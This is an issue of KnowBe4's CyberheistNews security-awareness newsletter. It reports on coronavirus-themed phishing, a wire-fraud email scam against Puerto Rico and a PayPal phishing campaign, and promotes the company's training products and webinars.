CyberheistNews Vol 10 #8 [Heads-up] The World Health Organization Warns of New Coronavirus Phishing Attacks. Inoculate Your Employees!


CyberheistNews Vol 10 #08
[Heads-up] The World Health Organization Warns of New Coronavirus Phishing Attacks. Inoculate Your Employees!

The World Health Organization (WHO) is putting out an alert about ongoing Coronavirus-themed phishing attacks that impersonate the WHO and try to steal confidential information and deliver malware. This is exactly what we predicted.

"Criminals are disguising themselves as WHO to steal money or sensitive information," the United Nations agency says in the Coronavirus scam alert.

"WHO is aware of suspicious email messages attempting to take advantage of the 2019 novel coronavirus emergency."

The phishing messages are camouflaged to appear as being sent by WHO officials and ask the targets to share sensitive info like usernames and passwords, redirect them to a phishing landing page via malicious links embedded in the emails, or ask them to open malicious attachments containing malware payloads. "If you are contacted by a person or organization that appears to be from WHO, verify their authenticity before responding," says the WHO.

WHO phishing campaign

An example of such a phishing campaign using COVID-19 as bait and asking potential victims to "go through the attached document on safety measures regarding the spreading of coronavirus" was spotted by the Sophos Security Team earlier this month.

They were also asked to download the attachment to their computer by clicking on a "Safety Measures" button that would instead redirect them to a compromised site the attackers use as a phishing landing page.

This phishing page loads the WHO website in a frame in the background and displays a pop-up in the foreground asking the targets to verify their e-mail.

Once they write in their usernames and passwords and click the "Verify" button, their credentials will be exfiltrated to a server controlled by the attackers over an unencrypted HTTP connection and redirect them to WHO's official website — not that the phishers would care about their victims' data security.

If you have not done this yet, I would send your employees, friends and family something like the following. Feel free to copy/paste/edit.

"The worldwide spread of the new Coronavirus is being used by bad guys to scare people into clicking on links, open malicious attachments, or give out confidential information. Be careful with anything related to the Coronavirus: emails, attachments, any social media, texts on your phone, anything. Look out for topics like:
  • Check updated Coronavirus map in your city
  • Coronavirus Infection warning from local school district
  • CDC or World Health Organization emails or social media Coronavirus messaging
  • Keeping your children safe from Coronavirus
  • You might even get a scam phone call to raise funds for "victims".
There will be a number of scams related to this, so please remember to Think Before You Click!

For KnowBe4 Customers, you can find a Coronavirus-themed simulated phishing template in the Current Events category. I suggest you send to your employees and friends / family more or less immediately. More:
[Alert] It Only Takes One Phish: Puerto Rico Gets Scammed Out of $2.6 Million

Once again, it was the human factor and skilled phishing tactics from the bad guys that was responsible for such a material loss. And, from the sound of it, policy and procedure either weren’t in place or weren’t followed.

This is a very simple tale; in fact, so simple, it sounds like all the attackers used was a single email. Reports of one of the agencies of the Puerto Rican government, the Industrial Development Company, transferred the millions on January 17th. According to news reports, a simple email purporting to be a contractor was received requesting a change to banking details for payment remittance.

The FBI’s Recovery Asset Team is now involved and is working to attempt to recover the funds.

Anytime emails are sent asking for any kind of information or changes made involving bank accounts, transactions, and transfers, organizations need to protect themselves proactively.

Establish a policy that mandates all requests be validated using an alternative medium, such as in-person or over the phone. Users whose roles have them even marginally involved with money-related transactions should step through security awareness training to both understand that these types of scams occur regularly and how they can spot a suspicious email before the damage is done. More:
See the New Season 2 of This Netflix-Style Video Series From KnowBe4 - 'The Inside Man'

We’re excited to announce Season 2 of the award-winning KnowBe4 Original Series - ‘The Inside Man’. This network-quality video training series delivers an entertaining learning experience that ties security awareness principles from each episode to key cybersecurity best practices. From social engineering, insider threats and passwords, to third-party apps and AI, ‘The Inside Man’ teaches your users real-world application that makes learning how to make smarter security decisions fun and engaging.

The Story so Far...

Six months after his transformation from undercover hacker to company defender, Mark our flawed hero from Season 1, struggles to keep his past a secret as he protects the company’s latest acquisition from a new nemesis, while at the same time navigating a budding romance.

With his personal and professional lives increasingly intertwined, becoming a White Hat might just have been the easy part…

Watch ‘The Inside Man’ Season 2 trailer and one episode to see how entertaining security awareness training can be!
IBM: "Phishing *Remains* the Most Frequent Initial Attack Vector of Successful Criminal Hacks"

With cybercriminals always looking for the most successful way to carry out a successful attack, phishing once again proves to be the most adaptable and viable attack vector.

Over the years, attackers have looked for new ways to gain access to an organization’s network. Years ago, it was SQL Injection attacks. More recently the industry has been plagued with remote desktop-based attacks. But throughout the years, one attack vector has remained near or at the top of the list: phishing.

It just makes sense – email-based phishing attacks allow the cybercriminal access inside your corporate network, given a chance to execute…IF their phishing scam is good enough to fool the email recipient – your user.

According to the X-Force Threat Intelligence Index 2020, produced by IBM X-Force Incident Response and Intelligence Services (IRIS), phishing is still the number one attack vector in use today.

In a close race, phishing just edges out scanning for and exploiting vulns and unauthorized use of credentials. IBM X-Force also notes that phishing – representing the attack vector used in 31 percent of attacks – is, technically, down from 44 percent in 2018. Even so, first place is first place. And that means it’s a clear indicator where organizations today need to place a cybersecurity focus.

You can put email scanning, DNS lookups, and endpoint-based antivirus in place, but the most mature security models understand – and, frankly, expect – some measure of phishing emails will still make it past layered security controls.

Phishing Isn’t Going Anywhere

And so, new-school security awareness training needs to be added to your layered security strategy, leveraging the user as an additional security measure. When users are educated on what phishing attacks look like, they can more easily spot scams without putting your organization at risk by engaging with email-based malicious content.
[Live Demo] Identify and Respond to Email Threats Faster With PhishER

Your users are likely already reporting potentially dangerous emails in some fashion within your organization. The increase of this email traffic can present a new problem!

With only approximately 1 in 10 user-reported emails being verified as actually malicious, how do you handle the real phishing attacks and email threats —and just as importantly— effectively manage the other 90% of user-reported messages accurately and efficiently?

Now you can with PhishER, a product which allows your Incident Response team to quickly identify and respond to email threats faster. This will save them so much time!

See how you can best manage your user-reported messages.

Join us TOMORROW, February 19 @ 2:00 pm (ET) for a live 30-minute demonstration of the PhishER platform. With PhishER you can:
  • Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
  • Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
  • Augment your analysis and prioritization of user-reported messages with PhishML, PhishER’s new machine-learning module
  • See clusters of messages to identify a potential phishing attack against your organization
  • Meet critical SLAs within your organization to process and prioritize threats and legitimate emails
  • Easy integration with KnowBe4’s email add-in button, Phish Alert, or forwarding to a mailbox works too!
Find out how adding PhishER can be a huge time-saver for your Incident Response team!

Date/Time: TOMORROW, February 19 @ 2:00 (ET)

Save My Spot!
New PayPal Phishing Attack Steals Confidential Data Like Your Passport and Social Security Number

An ongoing PayPal phishing campaign is trying to steal a wide range of personal information, including Social Security numbers and passport photos, Threatpost reports. The scams were discovered by Czech IT company ALEF NULA, which noted that the scam is notable for the breadth of data it requests.

The phishing messages inform the recipient that their PayPal account has been locked because a new device logged into it. The recipient is asked to log in to their account and update their info. The link in the message is a URL that redirects the user to the phishing site.

The first two pages on the phishing site are standard forms asking for users’ names, addresses, phone numbers, and payment card details. The next page asks for the user’s date of birth and Social Security number, and the final page tells them to upload a photo of their passport.

Jan Kopriva at ALEF NULA explained that this is a common strategy in modern phishing scams. “Over the years, phishing authors seem to have learned that once they hook a phish, they should try to get all the information they can from them,” Kopriva said. “This is the reason why many current campaigns don’t stop after getting the usual credit card information, but go further.”

Kopriva also noted that the way the page is laid out might compel users to upload even more information than the attackers are after.

“What might be a bit unfortunate from the standpoint of a potential victim is that after the user uploads a file, the page is refreshed but no confirmation is displayed,” Kopriva said. “This means that a less vigilant user might upload multiple photos of documents while thinking that their previous attempts were invalid for some reason.”

This campaign can be easily avoided by someone who knows what to look for. The initial email contains numerous grammatical errors, and the URL of the phishing site doesn’t even attempt to spoof PayPal’s real address. New-school security awareness training can help your employees recognize these types of irregularities. Threatpost has the story:
[NEW WEBINAR] Addressing the Challenge of Third-Party Vendor Risk: Securing Your Supply Chain

Your customer data, intellectual property, and financials are the lifeblood of your organization. If lost or leaked, there could be significant implications to the viability of your business. Maintaining control of that data, especially with third-party services, can be extremely challenging and requires that you ask the right questions and enforce stringent security policies.

In an environment of increased outsourcing, cloud computing adoption, and regulatory requirements, how do you manage vendor risk and ensure you have a consistent evaluation life cycle?

Join James McQuiggan, KnowBe4’s Security Awareness Advocate, to get actionable steps you can use now to better manage your third-party vendor risk.

You’ll learn:
  • The importance of securing your organization’s critical data
  • How to determine Supplier Security Proficiency
  • Why it’s important to understand the source of third-party products
  • The impact Vendor Questionnaires have on your Security Posture
  • How leveraging a GRC platform can ease the burden of risk assessments and audits
Date/Time: Wednesday, February 26 @ 2 PM (ET)

Save My Spot!

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

PS, We're excited to roll out the new ModStore and the KnowBe4 2020 versions of our flagship KMSAT training modules. Check them out here!
Quotes of the Week
"Patience is the companion of wisdom." - Augustine of Hippo (354 – 430)

"Never believe that a few caring people can't change the world.
For, indeed, that's all who ever have."

- Margaret Mead - Anthropologist (1901 - 1978)

Thanks for reading CyberheistNews
Security News
Most British Data Breaches Traced to Human Error

90% of data breaches in the UK during 2019 were caused by human mistakes, Infosecurity Magazine reports. CybSafe analyzed all the data breach reports received by the UK Information Commissioner’s Office (ICO) last year and found that human error was responsible for nine out of ten of these incidents.

45% percent of the 2376 breaches involved users falling for phishing attacks, while unauthorized access made up 33% of the incidents. 10% of the attacks involved the use of ransomware or some other type of malware, and just 2.7% were traced to hardware or software misconfigurations.

In addition, CybSafe found that the number of breaches caused by human error has been increasing, rising from 87% in 2018.

Oz Alashe, CEO of CybSafe, stated that the human element is one of the most important security issues to address, since social engineering is much easier, cheaper, and more effective than purely technical hacking.

“As this analysis shows, it’s almost always human error that enables attackers to access encrypted channels and sensitive information,” Alashe said. “Staff can make a variety of mistakes that put their company’s data or systems at risk, often because they lack the knowledge or motivation to act securely, or simply because they accidentally slip up.”

Alashe emphasized, however, that while employees are the source of this problem, they’re also the solution. “Employees of course pose a certain level of cyber-risk to their employers, as seen in our findings thus far,” Alashe said.

“Nevertheless, people also have an important role to play in helping to protect the companies they work for, and human cyber-risk can almost always be significantly reduced by encouraging changes in staff cyber-awareness, behavior and culture.” Infosecurity Magazine has the story:
Education Is Necessary to Stay Ahead of Threats

Most people don’t realize how vulnerable they are to social engineering until they experience it, according to Anna Collard, the founder of KnowBe4’s South African security awareness company Popcorn Training.

Collard joined the CyberWire’s Hacking Humans podcast to discuss the results of a survey of Africans concerning cyber awareness. Collard stressed that Africa is quickly becoming a major target for scammers since so many Africans are coming online for the first time.

Collard said one of the findings of the survey that struck her the most was how many people thought they knew more than they actually did.

“I find personally, what is most interesting the in results that this report showed was that you also get quite a large percentage of people that think they are sort of equipped or that they know what to do, but they actually don't,” Collard said.

“So, that's that whole concept of unconscious incompetence – you know, that quadrant where you kind of, you know what you don't know, but then you don't know you don't know. And that's a massive problem because you have people that think, well, everything's fine. And they aren't even aware of the problem itself or that they should educate themselves a bit more.”

Collard pointed to one example of this, where the survey found that most respondents felt they’d received sufficient training, but more than half didn’t know about some basic security threats and best practices.

“But the people that responded, they said that about 60% felt the employers have done enough to, you know, raise awareness,” she said. “But in the same token, 65% didn't know what ransomware was. More than 50% had no idea what multi-factor authentication is or how you would use that.”

Collard added this type of unawareness is a universal issue that affects people around the world. “And that's not just African problems – it's worldwide, right?” she continued. “The rise in social engineering and phishing attacks and ransomware schemes. The need to put something as basic as two-factor authentication in place, especially if you do financial transactions on your mobile devices – it's so important.

Yeah, and people just, you know, they think they know, but at the same time, when you ask those sort of qualifying questions, they didn't.” The CyberWire has the story:
What KnowBe4 Customers Say

A customer in Australia provided answers to a reference check:

On what basis did you select KnowBe4, how does it compare to the other market leaders?

"Decision based on extensive local and global review of current market providers. Current features, innovation, customer experience and support. My key needs were a) an all rounded provider (rather than a niche service provider); b) competitive rate; c) ability to extend offerings to upskill our new Ambassador program; d) ongoing innovation. The material provided in the Gartner Magic Quadrant report further supported my decision:"

In your opinion, why does KnowBe4 provide a superior product offering

"The pre- and post-sales support is exceptional. Flawless execution and commitment to customer needs. We continue to learn the nuances of the platform but the KnowBe4 service team (Jeff) is outstanding and extremely responsive. The platform is comprehensive, has great reporting options and great value adds – Personal Risk Score assessment and training modules for repeated phishing user failures, extensive library of messages, webinars (also open to our Ambassadors)"

Any other insights?

"The KnowBe4 team offer far more than just a platform. We had the opportunity to participate in a guest speaker forum that was made open to our Ambassadors and staff. This is an invaluable ‘value add’ when you have a limited budget to work with. They also offer a strategic consulting to support niche campaigns to target markets and have an internal resource to support education in the workplace.

Prior to signing with KnowBe4 we had a barrage of providers knocking on our door. The majority of offerings were equal on price but were a poor 2nd in terms of the full suite of capability on offer.

I would highly recommend KnowBe4 to any Australian organisation looking to progress their Change and Awareness program using a leading-edge platform and best in class service support."

"Hi Stu, I read your article on Having worked in an established corporate environment and in a startup company as a software developer for many years before I landed here, I think it’s great that you give credit to the team that you have built, but I know that your direction and philosophy and dream have a lot to do with that also.

I can tell you that EVERYONE I have ever talked to or met at KnowBe4 has been so positive and helpful and wonderful to work with. EVERYONE, I’m serious. Usually there’s a grouch or arrogant/egotistical personality somewhere but apparently not at KnowBe4. After reading your article, I can see why. You have everything together there. Congratulations to you for putting together such a unique company, and every day I am glad that we were able to find you when we did."
- B.G., IT Staff
The 10 Interesting News Items This Week
    1. "The intelligence coup of the century" Interesting story, 10-minute read for a break!

    2. DOJ charges four Chinese military hackers for Equifax hack:

    3. FBI Arrests Former MSP Employee for Peddling Cloud Server Admin Access:

    4. Apple Security Shock As Mac Threats Outpace Microsoft Windows By 2 To 1:

    5. Welcome to the era of Ransomware 2.0:

    6. Forget Hacks... Ransomware, Phishing Are Election Year's Real Threats:

    7. Scammers are trying to exploit coronavirus concerns to breach companies:

    8. US government goes all in to expose new malware used by North Korean hackers:

    9. Bill Offers $400M for State, Local Government Cybersecurity:

    10. A new station is on the air: CYBERCRIME RADIO is launching:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

FOLLOW US ON: Twitter | LinkedIn | YouTube
Copyright © 2014-2020 KnowBe4, Inc. All rights reserved.

Subscribe To Our Blog

Nuclear Ransomware Webinar

Get the latest about social engineering

Subscribe to CyberheistNews